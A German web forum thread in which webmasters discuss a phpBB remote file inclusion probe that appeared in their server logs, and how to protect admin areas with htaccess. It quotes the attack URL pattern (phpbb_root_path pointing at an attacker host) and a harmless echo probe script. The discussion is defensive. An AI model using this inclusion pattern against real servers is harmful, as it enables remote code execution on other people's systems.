jesus.txt im Referer

M

mwa

Mitglied
Seit heute taucht in einigen Webserver Logs folgende url im Referer auf:

HTTP_REFERER: meinedomain.tld/admin/admin_styles.php?phpbb_root_path=http://members.aol.com/underdense/jesus.txt

Eigentlich wäre der Sachverhalt ja klar, da probt einer. Der Exploit ist beschrieben in http://www2.autistici.org/anacron-group-it.../sile002adv.txt

Aber er gibt das ja im Referer an. Einen richtigen reim darüber kann ich mir nicht machen, was das zu bedeuten hat.
 
QUOTE (sd12 @ Fr 16.11.2007, 17:52) Vielleicht ist dieser Script Kiddie einfach nur doof?

Muss gestehen, dass ich diesen Gedanken auch hatte. Aber man geht ja immer zuerst davon aus, dass man selbst der Unwissende ist.
 
Die sind wirklich doof. Bei mir greifen die HTML Seiten an
biggrin.gif
Und versuchen Joomla-Module zu knacken obwohl ich nirgends Joomla benutze
rolleyes.gif
 
Der Exploit beruht darauf, daß eine Url mitgegeben wird:

CODE http://www.victim.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://attacker/


Wenn das zusätzlich im Referer auftaucht, dann ist das eher uninteressant - es steht ja schon direkt im Aufrufpfad.

Umgekehrt ist damit sichtbar, daß zumindest dieser Code nichts wirklich Schlimmes macht - da steht ja bloß


CODE <? echo "jesus";echo "2007"; ?>


drin. Ich hatte aber auch schon Protokolleinträge, wo die nachgeladene Datei richtig lang war und selbst reihenweise Hackversuche enthielt - so richtig auf Base64-Basis und ähnlichem.

@edi: Die Angriffe grasen einfach Domainnamen oder IP-Blöcke ab. Ich habe solche Angriffe gegen OpenSource-Produkte auch ständig - auf Windows-Servern.
 
Ich schütze meist die Adminbereiche von nicht-eigener Software zusätzlich per htaccess. So eine doppelte Passworteingabe ist zwar nervig, aber bei den vielen Exploits die immer wieder auftauchen sinnvoll.
 
QUOTE Wenn das zusätzlich im Referer auftaucht, dann ist das eher uninteressant - es steht ja schon direkt im Aufrufpfad.


Diese Aussage verstehe ich nicht. Kannst du mir das bitte genauer erläutern. Die aufgerufene Url ist:
meinedomain.tld/admin/admin_styles.php

und der Referer
HTTP_REFERER: meinedomain.tld/admin/admin_styles.php?phpbb_root_path=http://members.aol.com/underdense/jesus.txt


QUOTE Umgekehrt ist damit sichtbar, daß zumindest dieser Code nichts wirklich Schlimmes macht - da steht ja bloß

Richtig, der Code ist nicht schlimm. So probt man normalerweise Systeme. Der "böse" Code kommt erst nach positiver probe.


QUOTE Ich schütze meist die Adminbereiche von nicht-eigener Software zusätzlich per htaccess. So eine doppelte Passworteingabe ist zwar nervig, aber bei den vielen Exploits die immer wieder auftauchen sinnvoll.


Ja, das ist empfehlenswert.
 
Sie müssen sich einloggen oder registrieren, um hier antworten zu können.
Zurück
Oben